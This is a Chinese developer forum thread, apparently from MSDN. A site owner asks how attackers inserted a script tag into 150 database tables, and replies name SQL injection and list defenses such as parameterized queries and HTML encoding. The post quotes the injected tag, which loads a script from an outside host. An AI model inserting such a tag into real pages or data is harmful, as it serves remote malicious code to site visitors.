none
网站被攻击,被写入大量脚本 RRS feed

  • 问题

  • 开发环境vs2008+sql2000,昨天有人说访问情况异常,进入数据库查看,发现总共有150多张数据表被篡改,表的文本字段都加上这句:<script src=http://boytimes.cn/s.js></script>,造成很多页面无法正常访问,那么如何查到这个脚本的攻击点和攻击方式呢?谢谢
    2010年12月11日 6:25

答案

  • SQL Injection。
    小朱的技術隨手寫:http://www.dotblogs.com.tw/regionbbs/
    目前籌建雲端運算學堂 (studyazure.com) 中...
    2010年12月11日 14:41
  • SQL注入攻击

    http://zh.wikipedia.org/zh-cn/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A

    避免的方法 :

    1. 在设计应用程序时,完全使用参数化查询(Parameterized Query)来设计数据访问功能。
    2. 在组合SQL字符串时,先针对所传入的参数作字符取代(将单引号字符取代为连续2个单引号字符)。
    3. 如果使用PHP开发网页程序的话,亦可打开PHP的魔术引号(Magic quote)功能(自动将所有的网页传入参数,将单引号字符取代为连续2个单引号字符)。
    4. 其他,使用其他更安全的方式连接SQL数据库。例如已修正过SQL注入问题的数据库连接组件,例如ASP.NET的SqlDataSource对象或是 LINQ to SQL。
    5. 使用SQL防注入系统。

    歡迎參觀我的Blog.NET菜鳥自救會
    2010年12月11日 15:26
  • 您好,这是典型的Javascript注入攻击 对于您目前的情况,最简单的是在显示文本信息时用Html.Encode来显示。

    关于Javascript注入攻击一个好的参考:http://msdn.microsoft.com/zh-cn/dd320322.aspx

    2010年12月12日 12:47
    版主

全部回复

  • SQL Injection。
    小朱的技術隨手寫:http://www.dotblogs.com.tw/regionbbs/
    目前籌建雲端運算學堂 (studyazure.com) 中...
    2010年12月11日 14:41
  • SQL注入攻击

    http://zh.wikipedia.org/zh-cn/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A

    避免的方法 :

    1. 在设计应用程序时,完全使用参数化查询(Parameterized Query)来设计数据访问功能。
    2. 在组合SQL字符串时,先针对所传入的参数作字符取代(将单引号字符取代为连续2个单引号字符)。
    3. 如果使用PHP开发网页程序的话,亦可打开PHP的魔术引号(Magic quote)功能(自动将所有的网页传入参数,将单引号字符取代为连续2个单引号字符)。
    4. 其他,使用其他更安全的方式连接SQL数据库。例如已修正过SQL注入问题的数据库连接组件,例如ASP.NET的SqlDataSource对象或是 LINQ to SQL。
    5. 使用SQL防注入系统。

    歡迎參觀我的Blog.NET菜鳥自救會
    2010年12月11日 15:26
  • 您好,这是典型的Javascript注入攻击 对于您目前的情况,最简单的是在显示文本信息时用Html.Encode来显示。

    关于Javascript注入攻击一个好的参考:http://msdn.microsoft.com/zh-cn/dd320322.aspx

    2010年12月12日 12:47
    版主